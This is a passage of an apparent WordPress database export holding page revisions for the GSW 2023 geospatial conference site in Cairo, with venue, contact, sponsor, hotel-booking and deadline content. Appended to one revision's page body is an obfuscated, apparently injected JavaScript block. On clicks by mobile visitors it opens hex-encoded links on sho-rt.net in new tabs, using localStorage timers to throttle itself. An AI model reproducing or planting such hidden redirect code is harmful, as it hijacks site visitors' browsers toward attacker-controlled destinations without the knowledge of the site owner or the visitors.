el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 03:15:19','2023-05-18 03:15:19','',3066,'https://gsw2023.com/?p=4555',0,'revision','',0),
(4556,1,'2023-05-18 03:18:02','2023-05-18 03:18:02','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" 